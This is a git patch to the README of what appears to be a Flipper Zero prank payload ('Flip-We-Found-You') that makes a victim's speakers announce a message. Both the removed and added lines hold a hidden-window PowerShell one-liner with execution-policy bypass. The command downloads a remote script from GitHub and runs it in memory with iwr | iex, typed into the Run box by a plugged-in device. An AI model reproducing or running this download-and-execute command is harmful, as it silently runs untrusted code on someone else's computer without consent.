From a123453b2fc0cef5c3643753cfc91292a7d69e97 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 16 Dec 2022 14:52:01 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-We-Found-You/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-We-Found-You/README.md b/Payloads/Flip-We-Found-You/README.md index ee137c8..1c6489d 100644 --- a/Payloads/Flip-We-Found-You/README.md +++ b/Payloads/Flip-We-Found-You/README.md @@ -40,7 +40,7 @@ And sapi speak with talk through their speakers the message provided or a custom * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-We-Found-You/found-you.ps1?dl=1 | iex +powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/wefoundyou.ps1 | iex ```

(back to top)